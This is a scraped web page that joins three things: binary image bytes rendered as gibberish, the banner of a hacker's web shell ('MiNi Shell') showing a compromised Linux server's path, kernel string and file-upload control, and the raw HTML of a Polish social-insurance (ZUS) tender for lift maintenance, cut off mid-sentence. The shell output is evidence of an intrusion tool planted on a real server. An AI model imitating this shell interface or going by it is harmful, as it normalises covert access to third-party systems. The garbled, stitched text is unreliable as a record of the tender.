JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20240410/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20240410/0027910401-N-2024.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Usługi<br/> Wykonywanie okresowych przeglądów i konserwacji oraz napraw dźwigów osobowych i platform dla osób niepełnosprawnych </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">ZAKŁAD UBEZPIECZEŃ SPOŁECZNYCH</span></h3> <h3 class="mb-0">1.3.) Oddział zamawiającego: <span class="normal">ODDZIAŁ W OSTROWIE WIELKOPOLSKIM</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 00001775600553</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">ul. Wysocka 1B</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Ostrów Wielkopolski</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">63-400</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">wielkopolskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL416 - Kaliski</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">+48 62 7217533</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">zap_ostrow_wielkopolski@zus.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.zus.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - Zakład Ubezpieczeń Społecznych lub Kasa Rolniczego Ubezpieczenia Społecznego oraz zarządzane przez nie fundusze</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Inna działalność</span> </h3> <p class="mb-0"> Ubezpieczenia społeczne </p> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Wykonywanie okresowych przeglądów i konserwacji oraz napraw dźwigów osobowych i platform dla osób niepełnosprawnych </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-89dc80db-f650-11ee-b016-82aaee56c84c</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2024/BZP 00279104</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2024-04-10</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2023/BZP 00464397/03/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.3.1 Okresowe przeglądy i konserwcje oraz naprawy dźwigów osobowych i platform dla osób niepełnosprawnych</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://portal.smartpzp.pl/zus/public/postepowanie?postepowanie=56841727 <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">1. Składanie, zmiana i wycofanie ofert - odbywa się wyłącznie przy użyciu Platformy zakupowej: https://portal.smartpzp.pl/zus .<br/><br/>2. Korespondencja pomiędzy zamawiającym a wykonawcami, w tym składanie oświadczeń, podmiotowych środków dowodowych oraz innych informacji lub dokumentów, przekazywanych w postępowaniu, z wyjątkiem określonych w SWZ (składanie, zmiana i wycofanie ofert, uzgodnienie terminu wizji lokalnej oraz kontakt z Inspektorem Ochrony Danych) – odbywa się wyłącznie przy użyciu:<br/>2.1. Platformy zakupowej: https://portal.smartpzp.pl/zus ,<br/>2.2. poczty elektronicznej: zap_ostrow_wielkopolski@zus.pl (adres poczty elektronicznej zamawiającego)<br/>- zgodnie z wyborem nadawcy korespondencji.</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">1. Wymagania techniczne i organizacyjne, wysyłania i odbierania korespondencji elektronicznej, przekazywanej przy użyciu Platformy zakupowej, zostały opisane szczegółowo w Regulaminie SmartPZP, Instrukcji użytkownika SmartPZP oraz SWZ.<br/><br/>2. Sposób sporządzania oraz wymagania techniczne dla dokumentów elektronicznych określone zostały w:<br/>2.1. pkt 4.5 SWZ oraz<br/>2.2. rozporządzeniu Prezesa Rady Ministrów z dnia 30 grudnia 2020 r. w sprawie sposobu sporządzania i przekazywania informacji oraz wymagań technicznych dla dokumentów elektronicznych oraz środków komunikacji elektronicznej w postępowaniu o udzielenie zamówienia publicznego lub konkursie (Dz. U. z 2020 r. poz. 2452).</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Zgodnie z art. 19 ust. 1 ustawy Pzp, zamawiający realizuje obowiązki informacyjne, o których mowa w art. 13 ust. 1-3 RODO, przez zamieszczenie wymaganych informacji w SWZ</span></h3> <h3 class="mb-0">3.16.) RODO (ograniczenia stosowania): <span class="normal">Zgodnie z art. 19 ust. 1 ustawy Pzp, zamawiający realizuje obowiązki informacyjne, o których mowa w art. 13 ust. 1-3 RODO, przez zamieszczenie wymaganych informacji w SWZ</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">260000.271.11.2023-ZAP</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Usługi</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.5.) Wartość zamówienia: <span class="normal"> 198334,68 PLN </span> </h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.9.) Liczba części: <span class="normal">2</span></h3> <h3 class="mb-0">4.1.10.) Ofertę można składać na wszystkie części</h3> <h3 class="mb-0">4.1.11.) Zamawiający ogranicza liczbę części zamówienia, którą można udzielić jednemu wykonawcy: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="p-2 mt-4 bg-light">Część 1</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Zgodnie z SWZ:<br/><br/>&#34;2.1.3.1. część 1 zamówienia - wykonywanie okresowych przeglądów i konserwacji oraz naprawy dźwigów osobowych i platform dla osób niepełnosprawnych zamontowanych w budynkach Oddziału ZUS w Ostrowie Wielkopolskim, przy ul. Wysockiej 1b oraz Kościelnej 18, Budynku Inspektoratu ZUS w Kaliszu przy ul. Konopnickiej 31 oraz Biura Terenowego ZUS w Krotoszynie przy ul. Kobierskiej 5b, dalej „część 1 zamówienia&#34;<br/><br/>&#34;2.1.4.	Szczegółowy opis przedmiotu, zawiera dla:<br/>2.1.4.1. części 1 zamówienia - załącznik nr 1 do załącznika nr 7A do SWZ&#34;<br/><br/>&#34;2.1.5.2. wymagania w zakresie zatrudnienia osób są następujące: zgodnie z uregulowaniem zawartym w art. 95 ust. 1 ustawy Pzp, zamawiający wymaga przy realizacji zamówienia, przez cały okres wykonywania powierzonych im czynności, zatrudnienia przez wykonawcę lub podwykonawcę, na podstawie stosunku pracy, w pełnym wymiarze czasu pracy (pełny etat), w rozumieniu ustawy z dnia 26 czerwca 1974 r. – Kodeks pracy (tekst jedn.: Dz. U. z 2023 r., poz. 1465), dalej: ,,Kodeks pracy” oraz za wynagrodzeniem o wysokości nie mniejszej, niż minimalne wynagrodzenie za pracę, ustalone na podstawie art. 6-7 ustawy z dnia 10 października 2002 r. o minimalnym wynagrodzeniu za pracę (tekst jedn.: Dz. U. z 2020 r., poz. 2207 ze zm.), dalej: „ustawa o minimalnym wynagrodzeniu za pracę” - osób wykonujących czynności polegające na konserwacji dźwigów osobowych z napędem elektrycznym oraz platform dla osób niepełnosprawnych z napędem elektrycznym podlegających dozorowi technicznemu.<br/>2.1.5.3. szczegółowe określenie sposobu weryfikacji zatrudnienia osób, jak również uprawnień zamawiającego w zakresie kontroli spełniania przez wykonawcę wymagań związanych z zatrudnianiem osób oraz sankcji z tytułu niespełnienia tych wymagań – zawiera dla:<br/>2.1.5.3.1. części 1 zamówienia - załącznik nr 7A do SWZ&#34;<br/><br/>&#34;2.1.8.	Warunki realizacji zamówienia zostały szczegółowo określone dla:<br/>2.1.8.1. części 1 zamówienia - w załączniku nr 1 do załącznika nr 7A do SWZ&#34; </p> <h3 class="mb-0">4.2.5.) Wartość części: <span class="normal"> 144452,47 PLN </span> </h3> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">50750000-7 - Usługi w zakresie konserwacji wind</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">24 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Zgodnie z SWZ:<br/><br/>&#34;7.2. Kryterium oceny ofert<br/>7.2.1. Część 1 zamówienia: kryterium ceny (jedyne kryterium oceny ofert).<br/>7.2.2. Część 2 zamówienia: kryterium ceny (jedyne kryterium oceny ofert).<br/>7.3. Zasady oceny ofert zgodnie z ustalonym kryterium oceny ofert<br/>W zakresie części 1 i części 2 zamówienia:<br/>7.3.1. Ocenie w zakresie kryterium ceny podlegać będą wyłącznie oferty nie podlegające odrzuceniu.<br/>7.3.2. Za najkorzystniejszą ofertę zostanie uznana oferta z najniższą ceną.<br/>7.3.3. Jeżeli nie można dokonać wyboru najkorzystniejszej oferty ze względu na to, że zostały złożone oferty o takiej samej cenie, zamawiający wzywa wykonawców, którzy złożyli te oferty, do złożenia w terminie określonym przez zamawiającego ofert dodatkowych zawierających nową cenę.<br/>7.3.4. Wykonawcy, składając oferty dodatkowe, nie mogą oferować cen wyższych niż zaoferowane w uprzednio złożonych przez nich ofertach.<br/>7.3.5. Zamawiający wybiera najkorzystniejszą ofertę w terminie związania ofertą.<br/>7.3.6. Jeżeli termin związania ofertą upłynął przed wyborem najkorzystniejszej oferty, zamawiający wzywa wykonawcę, którego oferta otrzymała najwyższą ocenę, do wyrażenia, w wyznaczonym przez zamawiającego terminie, pisemnej zgody na wybór jego oferty.<br/>7.3.7. W przypadku braku zgody, o której mowa w pkt 7.3.6 SWZ, zamawiający zwraca się o wyrażenie takiej zgody do kolejnego wykonawcy, którego oferta została najwyżej oceniona, chyba że zachodzą przesłanki do unieważnienia postępowania.&#34;</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Wg kolejności</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Wyłącznie kryterium ceny </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.7.) Kolejność kryterium: <span class="normal">1</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 2</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Zgodnie z SWZ:<br/><br/>&#34;2.1.3.2. część 2 zamówienia - wykonywanie okresowych przeglądów i konserwacji oraz naprawy dźwigów osobowych i platform dla osób niepełnosprawnych zamontowanych w budynkach Inspektoratów ZUS w Lesznie przy Al. Krasińskiego 36, Rawiczu przy ul. Mikołajewicza 18 i Wolsztynie przy ul. Poznańskiej 1 oraz Biura Terenowego ZUS w Gostyniu przy ul. Nowe Wrota 10, dalej „część 2 zamówienia”.&#34;<br/><br/>&#34;2.1.4. Szczegółowy opis przedmiotu, zawiera dla: (...)<br/>2.1.4.2. części 2 zamówienia - załącznik nr 1 do załącznika nr 7B do SWZ.&#34;<br/><br/>&#34;2.1.5.2. wymagania w zakresie zatrudnienia osób są następujące: zgodnie z uregulowaniem zawartym w art. 95 ust. 1 ustawy Pzp, zamawiający wymaga przy realizacji zamówienia, przez cały okres wykonywania powierzonych im czynności, zatrudnienia przez wykonawcę lub podwykonawcę, na podstawie stosunku pracy, w pełnym wymiarze czasu pracy (pełny etat), w rozumieniu ustawy z dnia 26 czerwca 1974 r. – Kodeks pracy (tekst jedn.: Dz. U. z 2023 r., poz. 1465), dalej: ,,Kodeks pracy” oraz za wynagrodzeniem o wysokości nie mniejszej, niż minimalne wynagrodzenie za pracę, ustalone na podstawie art. 6-7 ustawy z dnia 10 października 2002 r. o minimalnym wynagrodzeniu za pracę (tekst jedn.: Dz. U. z 2020 r., poz. 2207 ze zm.), dalej: „ustawa o minimalnym wynagrodzeniu za pracę” - osób wykonujących czynności polegające na konserwacji dźwigów osobowych z napędem elektrycznym oraz platform dla osób niepełnosprawnych z napędem elektrycznym podlegających dozorowi technicznemu.<br/>2.1.5.3. szczegółowe określenie sposobu weryfikacji zatrudnienia osób, jak również uprawnień zamawiającego w zakresie kontroli spełniania przez wykonawcę wymagań związanych z zatrudnianiem osób oraz sankcji z tytułu niespełnienia tych wymagań – zawiera dla: (...)<br/>2.1.5.3.2. części 2 zamówienia - załącznik nr 7B do SWZ&#34;<br/><br/>&#34;2.1.8.	Warunki realizacji zamówienia zostały szczegółowo określone dla: (...)<br/>2.1.8.2. części 2 zamówienia - w załączniku nr 1 do załącznika nr 7B do SWZ.&#34; </p> <h3 class="mb-0">4.2.5.) Wartość części: <span class="normal"> 53882,21 PLN </span> </h3> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">50750000-7 - Usługi w zakresie konserwacji wind</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">24 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Zgodnie z SWZ:<br/><br/>&#34;7.2. Kryterium oceny ofert<br/>7.2.1. Część 1 zamówienia: kryterium ceny (jedyne kryterium oceny ofert).<br/>7.2.2. Część 2 zamówienia: kryterium ceny (jedyne kryterium oceny ofert).<br/>7.3. Zasady oceny ofert zgodnie z ustalonym kryterium oceny ofert<br/>W zakresie części 1 i części 2 zamówienia:<br/>7.3.1. Ocenie w zakresie kryterium ceny podlegać będą wyłącznie oferty nie podlegające odrzuceniu.<br/>7.3.2. Za najkorzystniejszą ofertę zostanie uznana oferta z najniższą ceną.<br/>7.3.3. Jeżeli nie można dokonać wyboru najkorzystniejszej oferty ze względu na to, że zostały złożone oferty o takiej samej cenie, zamawiający wzywa wykonawców, którzy złożyli te oferty, do złożenia w terminie określonym przez zamawiającego ofert dodatkowych zawierających nową cenę.<br/>7.3.4. Wykonawcy, składając oferty dodatkowe, nie mogą oferować cen wyższych niż zaoferowane w uprzednio złożonych przez nich ofertach.<br/>7.3.5. Zamawiający wybiera najkorzystniejszą ofertę w terminie związania ofertą.<br/>7.3.6. Jeżeli termin związania ofertą upłynął przed wyborem najkorzystniejszej oferty, zamawiający wzywa wykonawcę, którego oferta otrzymała najwyższą ocenę, do wyrażenia, w wyznaczonym przez zamawiającego terminie, pisemnej zgody na wybór jego oferty.<br/>7.3.7. W przypadku braku zgody, o której mowa w pkt 7.3.6 SWZ, zamawiający zwraca się o wyrażenie takiej zgody do kolejnego wykonawcy, którego oferta została najwyżej oceniona, chyba że zachodzą przesłanki do unieważnienia postępowania.&#34;</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Wg kolejności</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Wyłącznie kryterium ceny </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.7.) Kolejność kryterium: <span class="normal">1</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 1</p> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> Zgodnie z SWZ:<br/><br/>&#34;4.1.1. O udzielenie zamówienia mogą ubiegać się wykonawcy, którzy spełniają warunek udziału w postępowaniu, dotyczący zdolności zawodowej (kwalifikacji zawodowych osób skierowanych przez wykonawcę do realizacji zamówienia). Warunek , o którym mowa w zdaniu poprzednim, zostanie uznany za spełniony, jeżeli wykonawca wykaże, że skieruje do realizacji zamówienia:<br/>4.1.1.1. w przypadku części 1 zamówienia: co najmniej jedną osobę, posiadającą niezbędne kwalifikacje zawodowe do wykonywania czynności, polegających na konserwacji dźwigów osobowych z napędem elektrycznym oraz platform dla osób niepełnosprawnych z napędem elektrycznym, podlegających dozorowi technicznemu, w tym w szczególności osobę, posiadającą zaświadczenie kwalifikacyjne uprawniające do konserwacji dźwigów osobowych z napędem elektrycznym oraz platform dla osób niepełnosprawnych z napędem elektrycznym zgodnie z art. 22 ust. 3 ustawy z dnia 21 grudnia 2000 r. o dozorze technicznym (Dz. U. z 2023 r. poz. 1622); <br/>4.1.1.2. w przypadku części 2 zamówienia: co najmniej jedną osobę, posiadającą niezbędne kwalifikacje zawodowe do wykonywania czynności, polegających na konserwacji dźwigów osobowych z napędem elektrycznym oraz platform dla osób niepełnosprawnych z napędem elektrycznym, podlegających dozorowi technicznemu, w tym w szczególności osobę, posiadającą zaświadczenie kwalifikacyjne uprawniające do konserwacji dźwigów osobowych z napędem elektrycznym oraz platform dla osób niepełnosprawnych z napędem elektrycznym zgodnie z art. 22 ust. 3 ustawy z dnia 21 grudnia 2000 r. o dozorze technicznym (Dz. U. z 2023 r. poz. 1622);<br/>- przy czym osobą lub osobami, o których mowa w pkt 4.1.1.1 i 4.1.1.2, mogą być ta sama osoba lub te same osoby.<br/>Uwaga nr 1: w odniesieniu do warunku dotyczącego kwalifikacji zawodowych, wykonawcy wspólnie ubiegający się o udzielenie zamówienia mogą polegać na zdolnościach tych z wykonawców, którzy wykonają usługi, do realizacji których te zdolności są wymagane.<br/>Uwaga nr 2: w przypadku, o którym mowa powyżej (uwaga nr 1), wykonawcy wspólnie ubiegający się o udzielenie zamówienia dołączają do oferty oświadczenie, z którego wynika, które usługi wykonają poszczególni wykonawcy, o którym mowa w art. 117 ust. 4 ustawy Pzp, sporządzone zgodnie z wzorem, stanowiącym załącznik nr 3 do SWZ.&#34; <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">Zgodnie z SWZ:<br/>&#34;4.4.2.	Wymagane podmiotowe środki dowodowe składane na wezwanie zamawiającego.<br/>4.4.2.1. Zamawiający wezwie wykonawcę, którego oferta została najwyżej oceniona, do złożenia w wyznaczonym terminie, nie krótszym niż 5 dni od dnia wezwania, aktualnych na dzień złożenia, następujących podmiotowych środków dowodowych:<br/>(...)<br/>4.4.2.1.2.	w celu potwierdzenia braku podstaw wykluczenia wykonawcy z udziału w postępowaniu:<br/>4.4.2.1.2.1. oświadczenia wykonawcy o aktualności informacji zawartych w oświadczeniu, o którym mowa w art. 125 ust. 1 ustawy Pzp, w zakresie podstaw wykluczenia z postępowania wskazanych przez zamawiającego, sporządzonego zgodnie z wzorem, stanowiącym załącznik nr 5 do SWZ,<br/>4.4.2.1.2.2. w przypadku wspólnego ubiegania się o zamówienie przez wykonawców, oświadczenie o 